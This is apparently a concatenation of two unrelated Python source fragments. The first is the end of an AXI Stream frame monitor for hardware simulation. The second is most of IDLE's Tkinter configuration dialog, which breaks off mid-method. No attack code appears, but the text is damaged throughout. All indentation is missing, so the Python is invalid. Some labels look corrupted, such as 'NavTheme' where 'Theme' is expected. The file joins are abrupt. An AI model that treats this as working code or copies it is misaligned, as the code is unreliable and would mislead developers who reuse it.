# not last cycle; highest bit must be set
assert int(tkeep) & (1 << len(tkeep)-1)
if B > 0:
l = []
for i in range(B):
l.append(int(tdata[i]))
data.append(l)
else:
data.append(int(tdata))
keep.append(int(tkeep))
id.append(int(tid))
dest.append(int(tdest))
user.append(int(tuser))
first = False
if tlast:
frame.B = B
frame.N = N
frame.M = M
frame.WL = WL
frame.parse(data, keep, id, dest, user)
self.queue.append(frame)
self.sync.next = not self.sync
if name is not None:
print("[%s] Got frame %s" % (name, repr(frame)))
frame = AXIStreamFrame()
data = []
keep = []
id = []
dest = []
user = []
first = True
return instances()
|
|
"""IDLE Configuration Dialog: support user customization of IDLE by GUI
Customize font faces, sizes, and colorization attributes. Set indentation
defaults. Customize keybindings. Colorization and keybindings can be
saved as user defined sets. Select startup options including shell/editor
and default window size. Define additional help sources.
Note that tab width in IDLE is currently fixed at eight due to Tk issues.
Refer to comments in EditorWindow autoindent code for details.
"""
from Tkinter import *
import tkMessageBox, tkColorChooser, tkFont
import string
from idlelib.configHandler import idleConf
from idlelib.dynOptionMenuWidget import DynOptionMenu
from idlelib.tabbedpages import TabbedPageSet
from idlelib.keybindingDialog import GetKeysDialog
from idlelib.configSectionNameDialog import GetCfgSectionNameDialog
from idlelib.configHelpSourceEdit import GetHelpSourceDialog
from idlelib import macosxSupport
class ConfigDialog(Toplevel):
def __init__(self,parent,title):
Toplevel.__init__(self, parent)
self.wm_withdraw()
self.configure(borderwidth=5)
self.title('IDLE Preferences')
self.geometry("+%d+%d" % (parent.winfo_rootx()+20,
parent.winfo_rooty()+30))
#NavTheme Elements. Each theme element key is its display name.
#The first value of the tuple is the sample area tag name.
#The second value is the display name list sort index.
self.themeElements={'Normal Text':('normal','00'),
'Python Keywords':('keyword','01'),
'Python Definitions':('definition','02'),
'Python Builtins':('builtin', '03'),
'Python Comments':('comment','04'),
'Python Strings':('string','05'),
'Selected Text':('hilite','06'),
'Found Text':('hit','07'),
'Cursor':('cursor','08'),
'Error Text':('error','09'),
'Shell Normal Text':('console','10'),
'Shell Stdout Text':('stdout','11'),
'Shell Stderr Text':('stderr','12'),
}
self.ResetChangedItems() #load initial values in changed items dict
self.CreateWidgets()
self.resizable(height=FALSE,width=FALSE)
self.transient(parent)
self.grab_set()
self.protocol("WM_DELETE_WINDOW", self.Cancel)
self.parent = parent
self.tabPages.focus_set()
#key bindings for this dialog
#self.bind('<Escape>',self.Cancel) #dismiss dialog, no save
#self.bind('<Alt-a>',self.Apply) #apply changes, save
#self.bind('<F1>',self.Help) #context help
self.LoadConfigs()
self.AttachVarCallbacks() #avoid callbacks during LoadConfigs
self.wm_deiconify()
self.wait_window()
def CreateWidgets(self):
self.tabPages = TabbedPageSet(self,
page_names=['Fonts/Tabs','Highlighting','Keys','General'])
frameActionButtons = Frame(self,pady=2)
#action buttons
if macosxSupport.runningAsOSXApp():
# Changing the default padding on OSX results in unreadable
# text in the buttons
paddingArgs={}
else:
paddingArgs={'padx':6, 'pady':3}
self.buttonHelp = Button(frameActionButtons,text='Help',
command=self.Help,takefocus=FALSE,
**paddingArgs)
self.buttonOk = Button(frameActionButtons,text='Ok',
command=self.Ok,takefocus=FALSE,
**paddingArgs)
self.buttonApply = Button(frameActionButtons,text='Apply',
command=self.Apply,takefocus=FALSE,
**paddingArgs)
self.buttonCancel = Button(frameActionButtons,text='Cancel',
command=self.Cancel,takefocus=FALSE,
**paddingArgs)
self.CreatePageFontTab()
self.CreatePageHighlight()
self.CreatePageKeys()
self.CreatePageGeneral()
self.buttonHelp.pack(side=RIGHT,padx=5)
self.buttonOk.pack(side=LEFT,padx=5)
self.buttonApply.pack(side=LEFT,padx=5)
self.buttonCancel.pack(side=LEFT,padx=5)
frameActionButtons.pack(side=BOTTOM)
Frame(self, height=2, borderwidth=0).pack(side=BOTTOM)
self.tabPages.pack(side=TOP,expand=TRUE,fill=BOTH)
def CreatePageFontTab(self):
#tkVars
self.fontSize=StringVar(self)
self.fontBold=BooleanVar(self)
self.fontName=StringVar(self)
self.spaceNum=IntVar(self)
self.editFont=tkFont.Font(self,('courier',10,'normal'))
##widget creation
#body frame
frame=self.tabPages.pages['Fonts/Tabs'].frame
#body section frames
frameFont=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Base Editor Font ')
frameIndent=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Indentation Width ')
#frameFont
frameFontName=Frame(frameFont)
frameFontParam=Frame(frameFont)
labelFontNameTitle=Label(frameFontName,justify=LEFT,
text='Font Face :')
self.listFontName=Listbox(frameFontName,height=5,takefocus=FALSE,
exportselection=FALSE)
self.listFontName.bind('<ButtonRelease-1>',self.OnListFontButtonRelease)
scrollFont=Scrollbar(frameFontName)
scrollFont.config(command=self.listFontName.yview)
self.listFontName.config(yscrollcommand=scrollFont.set)
labelFontSizeTitle=Label(frameFontParam,text='Size :')
self.optMenuFontSize=DynOptionMenu(frameFontParam,self.fontSize,None,
command=self.SetFontSample)
checkFontBold=Checkbutton(frameFontParam,variable=self.fontBold,
onvalue=1,offvalue=0,text='Bold',command=self.SetFontSample)
frameFontSample=Frame(frameFont,relief=SOLID,borderwidth=1)
self.labelFontSample=Label(frameFontSample,
text='AaBbCcDdEe\nFfGgHhIiJjK\n1234567890\n#:+=(){}[]',
justify=LEFT,font=self.editFont)
#frameIndent
frameIndentSize=Frame(frameIndent)
labelSpaceNumTitle=Label(frameIndentSize, justify=LEFT,
text='Python Standard: 4 Spaces!')
self.scaleSpaceNum=Scale(frameIndentSize, variable=self.spaceNum,
orient='horizontal',
tickinterval=2, from_=2, to=16)
#widget packing
#body
frameFont.pack(side=LEFT,padx=5,pady=5,expand=TRUE,fill=BOTH)
frameIndent.pack(side=LEFT,padx=5,pady=5,fill=Y)
#frameFont
frameFontName.pack(side=TOP,padx=5,pady=5,fill=X)
frameFontParam.pack(side=TOP,padx=5,pady=5,fill=X)
labelFontNameTitle.pack(side=TOP,anchor=W)
self.listFontName.pack(side=LEFT,expand=TRUE,fill=X)
scrollFont.pack(side=LEFT,fill=Y)
labelFontSizeTitle.pack(side=LEFT,anchor=W)
self.optMenuFontSize.pack(side=LEFT,anchor=W)
checkFontBold.pack(side=LEFT,anchor=W,padx=20)
frameFontSample.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=BOTH)
self.labelFontSample.pack(expand=TRUE,fill=BOTH)
#frameIndent
frameIndentSize.pack(side=TOP,fill=X)
labelSpaceNumTitle.pack(side=TOP,anchor=W,padx=5)
self.scaleSpaceNum.pack(side=TOP,padx=5,fill=X)
return frame
def CreatePageHighlight(self):
self.builtinTheme=StringVar(self)
self.customTheme=StringVar(self)
self.fgHilite=BooleanVar(self)
self.colour=StringVar(self)
self.fontName=StringVar(self)
self.themeIsBuiltin=BooleanVar(self)
self.highlightTarget=StringVar(self)
##widget creation
#body frame
frame=self.tabPages.pages['Highlighting'].frame
#body section frames
frameCustom=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Custom Highlighting ')
frameTheme=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Highlighting NavTheme ')
#frameCustom
self.textHighlightSample=Text(frameCustom,relief=SOLID,borderwidth=1,
font=('courier',12,''),cursor='hand2',width=21,height=11,
takefocus=FALSE,highlightthickness=0,wrap=NONE)
text=self.textHighlightSample
text.bind('<Double-Button-1>',lambda e: 'break')
text.bind('<B1-Motion>',lambda e: 'break')
textAndTags=(('#you can click here','comment'),('\n','normal'),
('#to choose items','comment'),('\n','normal'),('def','keyword'),
(' ','normal'),('func','definition'),('(param):','normal'),
('\n ','normal'),('"""string"""','string'),('\n var0 = ','normal'),
("'string'",'string'),('\n var1 = ','normal'),("'selected'",'hilite'),
('\n var2 = ','normal'),("'found'",'hit'),
('\n var3 = ','normal'),('list', 'builtin'), ('(','normal'),
('None', 'builtin'),(')\n\n','normal'),
(' error ','error'),(' ','normal'),('cursor |','cursor'),
('\n ','normal'),('shell','console'),(' ','normal'),('stdout','stdout'),
(' ','normal'),('stderr','stderr'),('\n','normal'))
for txTa in textAndTags:
text.insert(END,txTa[0],txTa[1])
for element in self.themeElements.keys():
text.tag_bind(self.themeElements[element][0],'<ButtonPress-1>',
lambda event,elem=element: event.widget.winfo_toplevel()
.highlightTarget.set(elem))
text.config(state=DISABLED)
self.frameColourSet=Frame(frameCustom,relief=SOLID,borderwidth=1)
frameFgBg=Frame(frameCustom)
buttonSetColour=Button(self.frameColourSet,text='Choose Colour for :',
command=self.GetColour,highlightthickness=0)
self.optMenuHighlightTarget=DynOptionMenu(self.frameColourSet,
self.highlightTarget,None,highlightthickness=0)#,command=self.SetHighlightTargetBinding
self.radioFg=Radiobutton(frameFgBg,variable=self.fgHilite,
value=1,text='Foreground',command=self.SetColourSampleBinding)
self.radioBg=Radiobutton(frameFgBg,variable=self.fgHilite,
value=0,text='Background',command=self.SetColourSampleBinding)
self.fgHilite.set(1)
buttonSaveCustomTheme=Button(frameCustom,
text='Save as New Custom Theme',command=self.SaveAsNewTheme)
#frameTheme
labelTypeTitle=Label(frameTheme,text='Select : ')
self.radioThemeBuiltin=Radiobutton(frameTheme,variable=self.themeIsBuiltin,
value=1,command=self.SetThemeType,text='a Built-in Theme')
self.radioThemeCustom=Radiobutton(frameTheme,variable=self.themeIsBuiltin,
value=0,command=self.SetThemeType,text='a Custom Theme')
self.optMenuThemeBuiltin=DynOptionMenu(frameTheme,
self.builtinTheme,None,command=None)
self.optMenuThemeCustom=DynOptionMenu(frameTheme,
self.customTheme,None,command=None)
self.buttonDeleteCustomTheme=Button(frameTheme,text='Delete Custom Theme',
command=self.DeleteCustomTheme)
##widget packing
#body
frameCustom.pack(side=LEFT,padx=5,pady=5,expand=TRUE,fill=BOTH)
frameTheme.pack(side=LEFT,padx=5,pady=5,fill=Y)
#frameCustom
self.frameColourSet.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=X)
frameFgBg.pack(side=TOP,padx=5,pady=0)
self.textHighlightSample.pack(side=TOP,padx=5,pady=5,expand=TRUE,
fill=BOTH)
buttonSetColour.pack(side=TOP,expand=TRUE,fill=X,padx=8,pady=4)
self.optMenuHighlightTarget.pack(side=TOP,expand=TRUE,fill=X,padx=8,pady=3)
self.radioFg.pack(side=LEFT,anchor=E)
self.radioBg.pack(side=RIGHT,anchor=W)
buttonSaveCustomTheme.pack(side=BOTTOM,fill=X,padx=5,pady=5)
#frameTheme
labelTypeTitle.pack(side=TOP,anchor=W,padx=5,pady=5)
self.radioThemeBuiltin.pack(side=TOP,anchor=W,padx=5)
self.radioThemeCustom.pack(side=TOP,anchor=W,padx=5,pady=2)
self.optMenuThemeBuiltin.pack(side=TOP,fill=X,padx=5,pady=5)
self.optMenuThemeCustom.pack(side=TOP,fill=X,anchor=W,padx=5,pady=5)
self.buttonDeleteCustomTheme.pack(side=TOP,fill=X,padx=5,pady=5)
return frame
def CreatePageKeys(self):
#tkVars
self.bindingTarget=StringVar(self)
self.builtinKeys=StringVar(self)
self.customKeys=StringVar(self)
self.keysAreBuiltin=BooleanVar(self)
self.keyBinding=StringVar(self)
##widget creation
#body frame
frame=self.tabPages.pages['Keys'].frame
#body section frames
frameCustom=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Custom Key Bindings ')
frameKeySets=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Key Set ')
#frameCustom
frameTarget=Frame(frameCustom)
labelTargetTitle=Label(frameTarget,text='Action - Key(s)')
scrollTargetY=Scrollbar(frameTarget)
scrollTargetX=Scrollbar(frameTarget,orient=HORIZONTAL)
self.listBindings=Listbox(frameTarget,takefocus=FALSE,
exportselection=FALSE)
self.listBindings.bind('<ButtonRelease-1>',self.KeyBindingSelected)
scrollTargetY.config(command=self.listBindings.yview)
scrollTargetX.config(command=self.listBindings.xview)
self.listBindings.config(yscrollcommand=scrollTargetY.set)
self.listBindings.config(xscrollcommand=scrollTargetX.set)
self.buttonNewKeys=Button(frameCustom,text='Get New Keys for Selection',
command=self.GetNewKeys,state=DISABLED)
#frameKeySets
frames = [Frame(frameKeySets, padx=2, pady=2, borderwidth=0)
for i in range(2)]
self.radioKeysBuiltin=Radiobutton(frames[0],variable=self.keysAreBuiltin,
value=1,command=self.SetKeysType,text='Use a Built-in Key Set')
self.radioKeysCustom=Radiobutton(frames[0],variable=self.keysAreBuiltin,
value=0,command=self.SetKeysType,text='Use a Custom Key Set')
self.optMenuKeysBuiltin=DynOptionMenu(frames[0],
self.builtinKeys,None,command=None)
self.optMenuKeysCustom=DynOptionMenu(frames[0],
self.customKeys,None,command=None)
self.buttonDeleteCustomKeys=Button(frames[1],text='Delete Custom Key Set',
command=self.DeleteCustomKeys)
buttonSaveCustomKeys=Button(frames[1],
text='Save as New Custom Key Set',command=self.SaveAsNewKeySet)
##widget packing
#body
frameCustom.pack(side=BOTTOM,padx=5,pady=5,expand=TRUE,fill=BOTH)
frameKeySets.pack(side=BOTTOM,padx=5,pady=5,fill=BOTH)
#frameCustom
self.buttonNewKeys.pack(side=BOTTOM,fill=X,padx=5,pady=5)
frameTarget.pack(side=LEFT,padx=5,pady=5,expand=TRUE,fill=BOTH)
#frame target
frameTarget.columnconfigure(0,weight=1)
frameTarget.rowconfigure(1,weight=1)
labelTargetTitle.grid(row=0,column=0,columnspan=2,sticky=W)
self.listBindings.grid(row=1,column=0,sticky=NSEW)
scrollTargetY.grid(row=1,column=1,sticky=NS)
scrollTargetX.grid(row=2,column=0,sticky=EW)
#frameKeySets
self.radioKeysBuiltin.grid(row=0, column=0, sticky=W+NS)
self.radioKeysCustom.grid(row=1, column=0, sticky=W+NS)
self.optMenuKeysBuiltin.grid(row=0, column=1, sticky=NSEW)
self.optMenuKeysCustom.grid(row=1, column=1, sticky=NSEW)
self.buttonDeleteCustomKeys.pack(side=LEFT,fill=X,expand=True,padx=2)
buttonSaveCustomKeys.pack(side=LEFT,fill=X,expand=True,padx=2)
frames[0].pack(side=TOP, fill=BOTH, expand=True)
frames[1].pack(side=TOP, fill=X, expand=True, pady=2)
return frame
def CreatePageGeneral(self):
#tkVars
self.winWidth=StringVar(self)
self.winHeight=StringVar(self)
self.paraWidth=StringVar(self)
self.startupEdit=IntVar(self)
self.autoSave=IntVar(self)
self.encoding=StringVar(self)
self.userHelpBrowser=BooleanVar(self)
self.helpBrowser=StringVar(self)
#widget creation
#body
frame=self.tabPages.pages['General'].frame
#body section frames
frameRun=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Startup Preferences ')
frameSave=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Autosave Preferences ')
frameWinSize=Frame(frame,borderwidth=2,relief=GROOVE)
frameParaSize=Frame(frame,borderwidth=2,relief=GROOVE)
frameEncoding=Frame(frame,borderwidth=2,relief=GROOVE)
frameHelp=LabelFrame(frame,borderwidth=2,relief=GROOVE,
text=' Additional Help Sources ')
#frameRun
labelRunChoiceTitle=Label(frameRun,text='At Startup')
radioStartupEdit=Radiobutton(frameRun,variable=self.startupEdit,
value=1,command=self.SetKeysType,text="Open Edit Window")
radioStartupShell=Radiobutton(frameRun,variable=self.startupEdit,
value=0,command=self.SetKeysType,text='Open Shell Window')
#frameSave
labelRunSaveTitle=Label(frameSave,text='At Start of Run (F5) ')
radioSaveAsk=Radiobutton(frameSave,variable=self.autoSave,
value=0,command=self.SetKeysType,text="Prompt to Save")
radioSaveAuto=Radiobutton(frameSave,variable=self.autoSave,
value=1,command=self.SetKeysType,text='No Prompt')
#frameWinSize
labelWinSizeTitle=Label(frameWinSize,text='Initial Window Size'+
' (in characters)')
labelWinWidthTitle=Label(frameWinSize,text='Width')
entryWinWidth=Entry(frameWinSize,textvariable=self.winWidth,
width=3)
labelWinHeightTitle=Label(frameWinSize,text='Height')
entryWinHeight=Entry(frameWinSize,textvariable=self.winHeight,
width=3)
#paragraphFormatWidth
labelParaWidthTitle=Label(frameParaSize,text='Paragraph reformat'+
' width (in characters)')
entryParaWidth=Entry(frameParaSize,textvariable=self.paraWidth,
width=3)
#frameEncoding
labelEncodingTitle=Label(frameEncoding,text="Default Source Encoding")
radioEncLocale=Radiobutton(frameEncoding,variable=self.encoding,
value="locale",text="Locale-defined")
radioEncUTF8=Radiobutton(frameEncoding,variable=self.encoding,
value="utf-8",text="UTF-8")
radioEncNone=Radiobutton(frameEncoding,variable=self.encoding,
value="none",text="None")
#frameHelp
frameHelpList=Frame(frameHelp)
frameHelpListButtons=Frame(frameHelpList)
scrollHelpList=Scrollbar(frameHelpList)
self.listHelp=Listbox(frameHelpList,height=5,takefocus=FALSE,
exportselection=FALSE)
scrollHelpList.config(command=self.listHelp.yview)
self.listHelp.config(yscrollcommand=scrollHelpList.set)
self.listHelp.bind('<ButtonRelease-1>',self.HelpSourceSelected)
self.buttonHelpListEdit=Button(frameHelpListButtons,text='Edit',
state=DISABLED,width=8,command=self.HelpListItemEdit)
self.buttonHelpListAdd=Button(frameHelpListButtons,text='Add',
width=8,command=self.HelpListItemAdd)
self.buttonHelpListRemove=Button(frameHelpListButtons,text='Remove',
state=DISABLED,width=8,command=self.HelpListItemRemove)
#widget packing
#body
frameRun.pack(side=TOP,padx=5,pady=5,fill=X)
frameSave.pack(side=TOP,padx=5,pady=5,fill=X)
frameWinSize.pack(side=TOP,padx=5,pady=5,fill=X)
frameParaSize.pack(side=TOP,padx=5,pady=5,fill=X)
frameEncoding.pack(side=TOP,padx=5,pady=5,fill=X)
frameHelp.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=BOTH)
#frameRun
labelRunChoiceTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
radioStartupShell.pack(side=RIGHT,anchor=W,padx=5,pady=5)
radioStartupEdit.pack(side=RIGHT,anchor=W,padx=5,pady=5)
#frameSave
labelRunSaveTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
radioSaveAuto.pack(side=RIGHT,anchor=W,padx=5,pady=5)
radioSaveAsk.pack(side=RIGHT,anchor=W,padx=5,pady=5)
#frameWinSize
labelWinSizeTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
entryWinHeight.pack(side=RIGHT,anchor=E,padx=10,pady=5)
labelWinHeightTitle.pack(side=RIGHT,anchor=E,pady=5)
entryWinWidth.pack(side=RIGHT,anchor=E,padx=10,pady=5)
labelWinWidthTitle.pack(side=RIGHT,anchor=E,pady=5)
#paragraphFormatWidth
labelParaWidthTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
entryParaWidth.pack(side=RIGHT,anchor=E,padx=10,pady=5)
#frameEncoding
labelEncodingTitle.pack(side=LEFT,anchor=W,padx=5,pady=5)
radioEncNone.pack(side=RIGHT,anchor=E,pady=5)
radioEncUTF8.pack(side=RIGHT,anchor=E,pady=5)
radioEncLocale.pack(side=RIGHT,anchor=E,pady=5)
#frameHelp
frameHelpListButtons.pack(side=RIGHT,padx=5,pady=5,fill=Y)
frameHelpList.pack(side=TOP,padx=5,pady=5,expand=TRUE,fill=BOTH)
scrollHelpList.pack(side=RIGHT,anchor=W,fill=Y)
self.listHelp.pack(side=LEFT,anchor=E,expand=TRUE,fill=BOTH)
self.buttonHelpListEdit.pack(side=TOP,anchor=W,pady=5)
self.buttonHelpListAdd.pack(side=TOP,anchor=W)
self.buttonHelpListRemove.pack(side=TOP,anchor=W,pady=5)
return frame
def AttachVarCallbacks(self):
self.fontSize.trace_variable('w',self.VarChanged_fontSize)
self.fontName.trace_variable('w',self.VarChanged_fontName)
self.fontBold.trace_variable('w',self.VarChanged_fontBold)
self.spaceNum.trace_variable('w',self.VarChanged_spaceNum)
self.colour.trace_variable('w',self.VarChanged_colour)
self.builtinTheme.trace_variable('w',self.VarChanged_builtinTheme)
self.customTheme.trace_variable('w',self.VarChanged_customTheme)
self.themeIsBuiltin.trace_variable('w',self.VarChanged_themeIsBuiltin)
self.highlightTarget.trace_variable('w',self.VarChanged_highlightTarget)
self.keyBinding.trace_variable('w',self.VarChanged_keyBinding)
self.builtinKeys.trace_variable('w',self.VarChanged_builtinKeys)
self.customKeys.trace_variable('w',self.VarChanged_customKeys)
self.keysAreBuiltin.trace_variable('w',self.VarChanged_keysAreBuiltin)
self.winWidth.trace_variable('w',self.VarChanged_winWidth)
self.winHeight.trace_variable('w',self.VarChanged_winHeight)
self.paraWidth.trace_variable('w',self.VarChanged_paraWidth)
self.startupEdit.trace_variable('w',self.VarChanged_startupEdit)
self.autoSave.trace_variable('w',self.VarChanged_autoSave)
self.encoding.trace_variable('w',self.VarChanged_encoding)
def VarChanged_fontSize(self,*params):
value=self.fontSize.get()
self.AddChangedItem('main','EditorWindow','font-size',value)
def VarChanged_fontName(self,*params):
value=self.fontName.get()
self.AddChangedItem('main','EditorWindow','font',value)
def VarChanged_fontBold(self,*params):
value=self.fontBold.get()
self.AddChangedItem('main','EditorWindow','font-bold',value)
def VarChanged_spaceNum(self,*params):
value=self.spaceNum.get()
self.AddChangedItem('main','Indent','num-spaces',value)
def VarChanged_colour(self,*params):
self.OnNewColourSet()
def VarChanged_builtinTheme(self,*params):
value=self.builtinTheme.get()
self.AddChangedItem('main','Theme','name',value)
self.PaintThemeSample()
def VarChanged_customTheme(self,*params):
value=self.customTheme.get()
if value != '- no custom themes -':
self.AddChangedItem('main','Theme','name',value)
self.PaintThemeSample()
def VarChanged_themeIsBuiltin(self,*params):
value=self.themeIsBuiltin.get()
self.AddChangedItem('main','Theme','default',value)
if value:
self.VarChanged_builtinTheme()
else:
self.VarChanged_customTheme()
def VarChanged_highlightTarget(self,*params):
self.SetHighlightTarget()
def VarChanged_keyBinding(self,*params):
value=self.keyBinding.get()
keySet=self.customKeys.get()
event=self.listBindings.get(ANCHOR).split()[0]
if idleConf.IsCoreBinding(event):
#this is a core keybinding
self.AddChangedItem('keys',keySet,event,value)
else: #this is an extension key binding
extName=idleConf.GetExtnNameForEvent(event)
extKeybindSection=extName+'_cfgBindings'
self.AddChangedItem('extensions',extKeybindSection,event,value)
def VarChanged_builtinKeys(self,*params):
value=self.builtinKeys.get()
self.AddChangedItem('main','Keys','name',value)
self.LoadKeysList(value)
def VarChanged_customKeys(self,*params):
value=self.customKeys.get()
if value != '- no custom keys -':
self.AddChangedItem('main','Keys','name',value)
self.LoadKeysList(value)
def VarChanged_keysAreBuiltin(self,*params):
value=self.keysAreBuiltin.get()
self.AddChangedItem('main','Keys','default',value)
if value:
self.VarChanged_builtinKeys()
else:
self.VarChanged_customKeys()
def VarChanged_winWidth(self,*params):
value=self.winWidth.get()
self.AddChangedItem('main','EditorWindow','width',value)
def VarChanged_winHeight(self,*params):
value=self.winHeight.get()
self.AddChangedItem('main','EditorWindow','height',value)
def VarChanged_paraWidth(self,*params):
value=self.paraWidth.get()
self.AddChangedItem('main','FormatParagraph','paragraph',value)
def VarChanged_startupEdit(self,*params):
value=self.startupEdit.get()
self.AddChangedItem('main','General','editor-on-startup',value)
def VarChanged_autoSave(self,*params):
value=self.autoSave.get()
self.AddChangedItem('main','General','autosave',value)
def VarChanged_encoding(self,*params):
value=self.encoding.get()
self.AddChangedItem('main','EditorWindow','encoding',value)
def ResetChangedItems(self):
#When any config item is changed in this dialog, an entry
#should be made in the relevant section (config type) of this
#dictionary. The key should be the config file section name and the
#value a dictionary, whose key:value pairs are item=value pairs for
#that config file section.
self.changedItems={'main':{},'highlight':{},'keys':{},'extensions':{}}
def AddChangedItem(self,type,section,item,value):
value=str(value) #make sure we use a string
if section not in self.changedItems[type]:
self.changedItems[type][section]={}
self.changedItems[type][section][item]=value
def GetDefaultItems(self):
dItems={'main':{},'highlight':{},'keys':{},'extensions':{}}
for configType in dItems.keys():
sections=idleConf.GetSectionList('default',configType)
for section in sections:
dItems[configType][section]={}
options=idleConf.defaultCfg[configType].GetOptionList(section)
for option in options:
dItems[configType][section][option]=(
idleConf.defaultCfg[configType].Get(section,option))
return dItems
def SetThemeType(self):
if self.themeIsBuiltin.get():
self.optMenuThemeBuiltin.config(state=NORMAL)
self.optMenuThemeCustom.config(state=DISABLED)
self.buttonDeleteCustomTheme.config(state=DISABLED)
else:
self.optMenuThemeBuiltin.config(state=DISABLED)
self.radioThemeCustom.config(state=NORMAL)
self.optMenuThemeCustom.config(state=NORMAL)
self.buttonDeleteCustomTheme.config(state=NORMAL)
def SetKeysType(self):
if self.keysAreBuiltin.get():
self.optMenuKeysBuiltin.config(state=NORMAL)
self.optMenuKeysCustom.config(state=DISABLED)
self.buttonDeleteCustomKeys.config(state=DISABLED)
else:
self.optMenuKeysBuiltin.config(state=DISABLED)
self.radioKeysCustom.config(state=NORMAL)
self.optMenuKeysCustom.config(state=NORMAL)
self.buttonDeleteCustomKeys.config(state=NORMAL)
def GetNewKeys(self):
listIndex=self.listBindings.index(ANCHOR)
binding=self.listBindings.get(listIndex)
bindName=binding.split()[0] #first part, up to first space
if self.keysAreBuiltin.get():
currentKeySetName=self.builtinKeys.get()
else:
currentKeySetName=self.customKeys.get()
currentBindings=idleConf.GetCurrentKeySet()
if currentKeySetName in self.changedItems['keys'].keys(): #unsaved changes
keySetChanges=self.changedItems['keys'][currentKeySetName]
for event in keySetChanges.keys():
currentBindings[event]=keySetChanges[event].split()
currentKeySequences=currentBindings.values()
newKeys=GetKeysDialog(self,'Get New Keys',bindName,
currentKeySequences).result
if newKeys: #new keys were specified
if self.keysAreBuiltin.get(): #current key set is a built-in
message=('Your changes will be saved as a new Custom Key Set. '+
'Enter a name for your new Custom Key Set below.')
newKeySet=self.GetNewKeysName(message)
if not newKeySet: #user cancelled custom key set creation
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
return
else: #create new custom key set based on previously active key set
self.CreateNewKeySet(newKeySet)
self.listBindings.delete(listIndex)
self.listBindings.insert(listIndex,bindName+' - '+newKeys)
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
self.keyBinding.set(newKeys)
else:
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
def GetNewKeysName(self,message):
usedNames=(idleConf.GetSectionList('user','keys')+
idleConf.GetSectionList('default','keys'))
newKeySet=GetCfgSectionNameDialog(self,'New Custom Key Set',
message,usedNames).result
return newKeySet
def SaveAsNewKeySet(self):
newKeysName=self.GetNewKeysName('New Key Set Name:')
if newKeysName:
self.CreateNewKeySet(newKeysName)
def KeyBindingSelected(self,event):
self.buttonNewKeys.config(state=NORMAL)
def CreateNewKeySet(self,newKeySetName):
#creates new custom key set based on the previously active key set,
#and makes the new key set active
if self.keysAreBuiltin.get():
prevKeySetName=self.builtinKeys.get()
else:
prevKeySetName=self.customKeys.get()
prevKeys=idleConf.GetCoreKeys(prevKeySetName)
newKeys={}
for event in prevKeys.keys(): #add key set to changed items
eventName=event[2:-2] #trim off the angle brackets
binding=string.join(prevKeys[event])
newKeys[eventName]=binding
#handle any unsaved changes to prev key set
if prevKeySetName in self.changedItems['keys'].keys():
keySetChanges=self.changedItems['keys'][prevKeySetName]
for event in keySetChanges.keys():
newKeys[event]=keySetChanges[event]
#save the new theme
self.SaveNewKeySet(newKeySetName,newKeys)
#change gui over to the new key set
customKeyList=idleConf.GetSectionList('user','keys')
customKeyList.sort()
self.optMenuKeysCustom.SetMenu(customKeyList,newKeySetName)
self.keysAreBuiltin.set(0)
self.SetKeysType()
def LoadKeysList(self,keySetName):
reselect=0
newKeySet=0
if self.listBindings.curselection():
reselect=1
listIndex=self.listBindings.index(ANCHOR)
keySet=idleConf.GetKeySet(keySetName)
bindNames=keySet.keys()
bindNames.sort()
self.listBindings.delete(0,END)
for bindName in bindNames:
key=string.join(keySet[bindName]) #make key(s) into a string
bindName=bindName[2:-2] #trim off the angle brackets
if keySetName in self.changedItems['keys'].keys():
#handle any unsaved changes to this key set
if bindName in self.changedItems['keys'][keySetName].keys():
key=self.changedItems['keys'][keySetName][bindName]
self.listBindings.insert(END, bindName+' - '+key)
if reselect:
self.listBindings.see(listIndex)
self.listBindings.select_set(listIndex)
self.listBindings.select_anchor(listIndex)
def DeleteCustomKeys(self):
keySetName=self.customKeys.get()
if not tkMessageBox.askyesno('Delete Key Set','Are you sure you wish '+
'to delete the key set %r ?' % (keySetName),
parent=self):
return
#remove key set from config
idleConf.userCfg['keys'].remove_section(keySetName)
if keySetName in self.changedItems['keys']:
del(self.changedItems['keys'][keySetName])
#write changes
idleConf.userCfg['keys'].Save()
#reload user key set list
itemList=idleConf.GetSectionList('user','keys')
itemList.sort()
if not itemList:
self.radioKeysCustom.config(state=DISABLED)
self.optMenuKeysCustom.SetMenu(itemList,'- no custom keys -')
else:
self.optMenuKeysCustom.SetMenu(itemList,itemList[0])
#revert to default key set
self.keysAreBuiltin.set(idleConf.defaultCfg['main'].Get('Keys','default'))
self.builtinKeys.set(idleConf.defaultCfg['main'].Get('Keys','name'))
#user can't back out of these changes, they must be applied now
self.Apply()
self.SetKeysType()
def DeleteCustomTheme(self):
themeName=self.customTheme.get()
if not tkMessageBox.askyesno('Delete Theme','Are you sure you wish '+
'to delete the theme %r ?' % (themeName,),
parent=self):
return
#remove theme from config
idleConf.userCfg['highlight'].remove_section(themeName)
if themeName in self.changedItems['highlight']:
del(self.changedItems['highlight'][themeName])
#write changes
idleConf.userCfg['highlight'].Save()
#reload user theme list
itemList=idleConf.GetSectionList('user','highlight')
itemList.sort()
if not itemList:
self.radioThemeCustom.config(state=DISABLED)
self.optMenuThemeCustom.SetMenu(itemList,'- no custom themes -')
else:
self.optMenuThemeCustom.SetMenu(itemList,itemList[0])
#revert to default theme
self.themeIsBuiltin.set(idleConf.defaultCfg['main'].Get('Theme','default'))
self.builtinTheme.set(idleConf.defaultCfg['main'].Get('Theme','name'))
#user can't back out of these changes, they must be applied now
self.Apply()
self.SetThemeType()
def GetColour(self):
target=self.highlightTarget.get()
